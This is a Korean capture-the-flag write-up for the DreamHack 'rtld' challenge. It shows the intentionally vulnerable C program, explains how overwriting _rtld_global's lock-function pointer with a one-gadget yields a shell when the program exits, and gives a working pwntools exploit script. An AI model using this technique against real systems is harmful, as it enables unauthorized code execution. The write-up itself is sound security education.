[DreamHack System Hacking] rtld

문제 코드는 다음과 같다.

// gcc -o rtld rtld.c -fPIC -pie

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <dlfcn.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

void get_shell() {
    system("/bin/sh");
}

int main()
{
    long addr;
    long value; 

    initialize();

    printf("stdout: %p\n", stdout);

    printf("addr: ");
    scanf("%ld", &addr);

    printf("value: ");
    scanf("%ld", &value);

    *(long *)addr = value;
    return 0;
}

 

보호 기법을 먼저 확인해주었다.

Partial RELRO이므로 GOT overwrite이 가능하다.

 

 

 

코드 분석 

int main()
{
    long addr;
    long value; 

    initialize();

    printf("stdout: %p\n", stdout);

    printf("addr: ");
    scanf("%ld", &addr);

    printf("value: ");
    scanf("%ld", &value);

    *(long *)addr = value;
    return 0;
}

main함수를 살펴보면 stdout 라이브러리 주소를 출력하는 걸 확인할 수 있다.

_rtld_global_dl_rtld_lock_recursive을 oneshot gadget의 주소로 덮으면 쉘을 획득할 수 있다.

 

_rtld_global_dl_rtld_lock_recursive : 함수 주소

_rtld_global_dl_rtld_lock : 함수 인자

_rtld_global_lock_recursive에 있는 Libc 주소를 one gadget으로 덮으면 exit 될 때 one gadget을 실행할 수 있다.

_Gl_exit 함수는 _run_exit_handlers를 호출하는데, _run_exit_handlers는 Id.so에 존재하는 _dl._fini를 호출한다.

 

 

_di_fini

void
_dl_fini (void)
{
#ifdef SHARED
  int do_audit = 0;
 again:
#endif
  for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
      /* Protect against concurrent loads and unloads.  */
      __rtld_lock_lock_recursive (GL(dl_load_lock));

_di_fini 함수는 _rtld_lock_lock_recursive 함수를 호출한다.

이 함수와 인자는 _rtld_global 구조체의 멤버이다.

_rtld_global 구조체가 위치한 영역은 쓰기 권한이 있어서 _rtld_lock_lock_recursive 함수를 system으로, _dl_load_lock인자를 'sh'로 덮어쓸 수 있으면 system('sh') 호출이 가능하다.

 

 

 

익스플로잇 코드

from pwn import *

p = remote('host3.dreamhack.games', 12058)
stdout_offset = 0x3c5620
oneshot_offset = 0xf1147
rtld_global_offset = 0x5f0040

p.recvuntil('stdout: 0x')
stdout = int(p.recvline()[:-1], 16) 
libc = stdout - stdout_offset    # libc base
oneshot = libc + oneshot_offset  # oneshot gadget
rtld_global = libc + rtld_global_offset

p.sendlineafter('addr: ', str(rtld_global + 3848))
p.sendlineafter('value: ', str(oneshot))

p.interactive()